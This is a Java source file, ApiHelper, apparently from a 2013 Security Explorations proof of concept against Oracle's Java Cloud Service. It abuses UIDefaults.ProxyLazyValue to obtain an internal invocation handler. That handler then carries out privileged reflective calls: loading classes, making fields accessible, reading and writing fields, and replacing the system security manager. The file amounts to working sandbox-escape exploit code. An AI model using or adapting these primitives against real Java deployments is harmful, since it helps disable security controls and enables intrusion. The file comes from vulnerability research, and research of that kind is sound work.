/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.security.*;
import javax.swing.*;

public class ApiHelper {
 public static InvocationHandler ih;

 static {
  try {
   UIDefaults.ProxyLazyValue plv=new UIDefaults.ProxyLazyValue("oracle.cloud.jcs.scanning.impl.extension.PassthroughInvocationHandler",null,new Object[0]);
   ih=(InvocationHandler)plv.createValue(new UIDefaults()); 
  } catch(Throwable t) {}
 }

 public static Object invoke(Object o,Method m,Object args[]) throws Throwable {
  return ih.invoke(o,m,args);
 }

 public static Class for_name(String name) throws Throwable {
  Class c=java.lang.Class.class;

  Class ctab[]=new Class[1];
  ctab[0]=java.lang.String.class;

  Method m=c.getMethod("forName",ctab);

  Object args[]=new Object[1];
  args[0]=name;

  return (Class)ih.invoke(null,m,args);
 }

 public static void set_accessible(Object ao) throws Throwable {
  Class c=java.lang.reflect.AccessibleObject.class;

  Class ctab[]=new Class[1];
  ctab[0]=Boolean.TYPE;

  Method m=c.getMethod("setAccessible",ctab);

  Object args[]=new Object[1];
  args[0]=new Boolean(true);

  ih.invoke(ao,m,args);
 }

 public static Object field_get(Object f,Object o) throws Throwable {
  Class c=java.lang.reflect.Field.class;

  Class ctab[]=new Class[1];
  ctab[0]=java.lang.Object.class;

  Method m=c.getMethod("get",ctab);

  Object args[]=new Object[1];
  args[0]=o;

  return ih.invoke(f,m,args);
 }

 public static void field_set(Object f,Object o,Object val) throws Throwable {
  Class c=java.lang.reflect.Field.class;

  Class ctab[]=new Class[2];
  ctab[0]=java.lang.Object.class;
  ctab[1]=java.lang.Object.class;

  Method m=c.getMethod("set",ctab);

  Object args[]=new Object[2];
  args[0]=o;
  args[1]=val;

  ih.invoke(f,m,args);
 }

 public static void set_sm(Object sm) throws Throwable {
  Class c=java.lang.System.class;

  Class ctab[]=new Class[1];
  ctab[0]=java.lang.SecurityManager.class;

  Method m=c.getMethod("setSecurityManager",ctab);

  Object args[]=new Object[1];
  args[0]=sm;

  ih.invoke(null,m,args);
 }

}
